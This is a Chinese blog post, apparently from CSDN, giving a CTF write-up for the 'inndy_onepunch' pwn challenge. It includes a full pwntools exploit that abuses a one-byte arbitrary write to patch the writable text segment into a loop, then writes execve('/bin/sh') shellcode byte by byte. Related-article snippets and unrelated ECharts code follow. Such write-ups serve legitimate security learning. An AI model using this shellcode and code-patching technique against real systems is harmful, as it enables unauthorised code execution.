inndy_onepunch(text段有时是可以修改的)

最新推荐文章于 2022-10-03 11:16:00 发布
最新推荐文章于 2022-10-03 11:16:00 发布
阅读量632 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105864139
版权
pwn 同时被 3 个专栏收录
161 篇文章 25 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏

inndy_onepunch

用IDA分析一下程序,任意地址写一个字节。

想不到的是,text段可以修改,因此,我们可以直接修改text的指令,来达到多次利用。

#coding:utf8
#想不到text段竟然可以写
from pwn import *

context(os='linux',arch='amd64')
#sh = process('./onepunch')
sh = remote('node3.buuoj.cn',29567)
text = 0x400767

def writeData(addr,data):
   sh.sendlineafter('Where What?',hex(addr) + ' ' + str(data))
#通过一字节读写,我们修改text里的跳转
writeData(text+1,u32(asm('jnz $-0x4A')[1:].ljust(4,'\x00')))
#修改jnz指令为jmp
writeData(text,u32(asm('jmp $-0x4A')[0:1].ljust(4,'\x00')))
shellcode = asm('''mov rax,0x0068732f6e69622f
                   push rax
                   mov rdi,rsp
                   mov rax,59
                   xor rsi,rsi
                   mov rdx,rdx
                   syscall
                ''')
shellcode_addr = 0x0000000000400769
i = 0
for x in shellcode:
   data = u8(x)
   writeData(shellcode_addr + i,data)
   i = i + 1
#跳转到shellcode
writeData(text+1,u32(asm('jnz $+0x2')[1:].ljust(4,'\x00')))

sh.interactive()

由此,查阅资料知道了,修改text段可写,可以利用工具objcopy --writable-text来实现。因此,有时实在没办法,我们可以尝试一下text段是否可写。

ha1vk
关注
专栏目录
Hackme.inndy -> Onepunch
aoque9909的博客
08-01 232
Onepunch 这个题的想法必须得称妙了,需要对以往简单的认知进行一定的颠覆。特殊性在于程序的代码(0x401000)具有权限 1.通过修改程序代码控制程序流程 程序中只能对任意一个字节改一次,似乎没有任何利用空间,但是程序的跳转方式有点特殊,在函数内部大量使用了jz short loc_400756进行跳转。 add:jz及相似的jnz, jmp,等都是两...
(BUUCTFinndy_onepunch
xy1458214551的博客
01-03 390
BUUCTFinndy_onepunch题解
IDA反汇编学习- 修改.text数据
ooyyee的专栏
11-14 7502
http://blog.sina.com.cn/s/blog_45e2b66c0101bsfb.html
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 523
继续来做题目,这次的pwn主要功能是一个任意地址一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能一次。。。。 然后找了下别人的wp,发现代码居然可以,那骚操作就可以有很多了 这里比较入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
可执行程序文件的修改
weixin_45090728的博客
10-03 535
gdb修改可执行程序的值
GT400_HandPunch_C#_Punch_liond87_VS2019_
09-28
【标题】"GT400_HandPunch_C#_Punch_liond87_VS2019_" 指的是一个基于C#语言开发的手掌识别系统(HandPunch),由开发者liond87使用Visual Studio 2019进行编译和构建。这个项目可能是一个用于员工考勤管理的应用...
onepunch:使用Web技术创建演示文稿的命令行界面
04-29
onepunch是用于使用Web技术创建PDF演示文稿的命令行界面。 onepunch是为设计师设计的,它不提供任何默认样式。 设计人员可以编CSS文件并将其链接到index.html 。 先决条件 要使用onepunch ,您应该在系统中安装了...
How to lead a successful college life_speech punchline.docx
12-15
通过参加社团活动、志愿者服务或者学术研讨会,你可以结交新朋友,提升团队合作能力,同时也能增强自己的人际交往技巧和社会责任感。 勇于尝试和接受挑战也是成功大学生活的重要元素。不要害怕失败,因为失败是通往...
dayhab_frontend_punch_in
02-08
在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行程序。 ...
Health_punch
04-19
标题“Health_punch”可能指的是一个与健康或健身相关的项目或应用,但没有足够的信息来确定具体的内容。描述中同样只有“Health_punch”,没有提供额外的细节。由于标签是空的,我们无法通过标签来推测这个项目涉及...
c语言内存分区-(堆,栈,全局/静态存储区,自由存储区,代码区)与可执行程序的三-(Text,Date,Bss)...
weixin_34302798的博客
12-24 538
一、c语言五大内存分区 栈区(stack):存放函数形参和局部变量(auto类型),由编译器自动分配和释放 堆区(heap):该区由程序员申请后使用,需要手动释放否则会造成内存泄漏。如果程序员没有手动释放,那么程序结束时可能由OS回收。 全局/静态存储区:存放全局变量和静态变量(包括静态全局变量与静态局部变量),初始化的全局变量和静态局部变量放在一块,未初始化的放在另...
关于text、data和bss
热门推荐
编程的本质是数学问题
01-01 1万+
根据APUE,程序分为下面的:.text, data (initialized), bss, stack, heap。 data/bss/text: text在内存中被映射为只读,但.data和.bss是可的。 bss是英文Block Started by Symbol的简称,通常是指用来存放程序中未初始化的全局变量的一块内存区域,在程序载入时由内核清0。BSS属于静态内存分配。它的
text, data and bss: 代码和数据的所占空间详解
fuhanga123的博客
12-03 920
https://www.cnblogs.com/zhazhalovecoding/p/6010154.html https://my.oschina.net/betayuan/blog/1615785 不同的compiler在编译的过程中对于存储的分配可能略有不同,但基Text、Data和BSS本结构大致相同。 大体上可分为三Text、Data和BSS   text...
hackme pwn onepunch
ACdream
03-14 499
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &v6, &v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
第九课 在text入可执行代码
xuenixiang.com
07-26 765
入可执行代码这部分我们借助OD来完成(这部分比较考验汇编语言) 首先认识一下MessageBoxA这个API: 更详细的解释自己可以在编译器里面去搜索 在反汇编代码中可以看到他的参数传递方式同声明时的正好相反   认识程序中参数的传递,将2.exe载入到OD中。 按照编译器的习惯我们将”Hello word”字符串的地址放入eax寄存器中。我们知道Hello Word这个字符...
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 934
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1379
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
echarts热力图修改Punch Card
最新发布
09-10
ECharts是一款使用JavaScript编的开源可视化库,它提供了一种简单的方式来创建丰富的数据可视化图表。热力图(Heat Map)是ECharts中的一种图表类型,用于展示数据的密度分布,而Punch Card(打卡图)是一种特殊的热力图,常用于展示时间序列数据的分布情况,比如记录事件在特定时间发生的频率。 在ECharts中,如果你想要修改热力图来显示Punch Card效果,你需要对热力图的配置项进行一些特定的设置。以下是几个关键步骤: 1. 使用`xAxis`和`yAxis`定义数据的坐标轴,通常用于表示时间点。 2. 在`series`中设置`type`为`heatmap`,这是热力图的类型。 3. 通过`data`属性来提供具体的数据点,数据点通常是一个二维数组,每个内部数组表示一个数据点的x、y坐标和权重。 4. 配置`itemStyle`属性来自定义热力图单元格的样式,例如颜色渐变,以便清晰地显示不同密度的区域。 5. 可以通过`emphasis`属性来设置鼠标悬停时的样式,增强交互性。 示例代码如下: ```javascript option = { xAxis: { type: 'category', data: ['12a', '12p', '1a', '2a', '3a', '4a', '5a', '6a', '7a', '8a', '9a', '10a', '11a', '12p', '1p', '2p', '3p', '4p', '5p', '6p', '7p', '8p', '9p', '10p', '11p'] }, yAxis: { type: 'category', data: ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'] }, series: [{ name: 'Punch Card', type: 'heatmap', data: [ {value: [24, 0], count: 10}, // ... 更多数据 ], itemStyle: { normal: { color: function (params) { // 根据数据点的权重返回不同的颜色 return colorMap.get(params.value); } } }, emphasis: { itemStyle: { // 鼠标悬停时的样式 borderColor: '#fff', borderWidth: 1 } } }] }; ``` 在这代码中,`colorMap`是一个预定义的颜色映射函数,用于根据数据点的权重返回不同的颜色,以展示不同的密度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值